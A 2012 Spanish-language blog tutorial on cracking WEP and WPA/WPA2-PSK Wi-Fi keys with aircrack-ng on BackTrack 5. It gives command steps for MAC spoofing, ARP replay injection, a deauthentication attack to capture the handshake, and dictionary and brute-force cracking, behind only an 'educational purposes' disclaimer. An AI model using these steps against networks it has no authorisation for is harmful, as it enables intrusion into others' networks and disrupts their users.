jueves, 12 de abril de 2012

seguridad wireless (WEP-WPA2-PSK)



::::ESTO VA CON FINES EDUCATIVOS::::::::CADA UNO ES RESPONSABLE DE SUS ACTOS::::::


en esta publicación veremos breve mente como hacer auditorias a redes WIFI usando AIRCRACK-NG esto es para Linux y para cualquier distro. dependiendo de la que ustedes usan buscaran como descargarselo, en este caso no hay que instalar nada ya que para mas comodidad utilizaremos BACKTRACK 5


yayayayaya pero ya es mucho Cuenteoo asi que manos a la obra y abran 4 consolas altoke XD


WEP (ARP resquest replay attack)


CAMBIAMOS LA MAC.

  • ·         Airmon-ng
  • ·         Airmon-ng stop “INTERFACE”
  • ·         Ifconfig “INTERFACE” down
  • ·         Macchanger –mac 00:11:22:33:44:55 “INTERFACE”
  • ·         Airmon-ng start


BUSCAMOS REDES.

  • ·         Airodump-ng “INTERFACE”
  • ·         CTRL + C Para detener escaneo
  • ·         Airodump-ng  -c “CANAL”  -w datas  --bssid  “MAC BSSID” “INTERFACE” (comienza la captura, no cerrar)


ASOCIARNOS A LA RED (en otra consola)

  • ·         Aireplay-ng -1 0 –a “MAC BSSID” –h 00:11:22:33:44:55 –e “ESSID” “INTERFACE” (asociación con la red)


INYECTANDO TRÁFICO

  • ·         aireplay-ng -3 -b “MAC BSSID” -h 00:11:22:33:44:55 “INTERFACE” (Captura Datas a mas velocidad)

DESENCRIPTANDO 
  • ·         aircrack-ng datas-01.cap (Desencripta la clave con Aircrack)   


WPA/WPA2/PSK:



INTERFAZ EN MODO MONITOR
  • aimon-ng (Saber nuestra Interface)
  • airmon-ng start “INTERFACE” (Colocamos en modo monitor nuestra Interface)


CAPTURANDO EL HANDSHAKE
  • airodump-ng “INTERFACE mon0”  (Scannea redes)
  • CTRL + C (Frena el scanneo)
  • airodump-ng “INTERFACE mon0”  --channel 1 --bssid “MAC BSSID”  -w /tmp/wpa2 (Guardara los *.cap en el directorio que le indicamos)
  • aireplay-ng -0 1 -a “MAC BSSID”  -c “STATION” INTERFACE mon0” (Comenzara la captura del Handshake) 2.3


OBTENIENDO CLAVE
  • aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b “MAC BSSID”  /tmp/wpa2*.cap           (Saca la Pass por Diccionario)
  • /pentest/passwords/jtr/john --stdout --incremental:all | aircrack-ng -b “MAC BSSID”  -w - /tmp/wpa2*.cap  (Saca la Pass por Fuerza Bruta con John The Ripper)

ACA UN VIDEO CRACKEANDO WPA.......................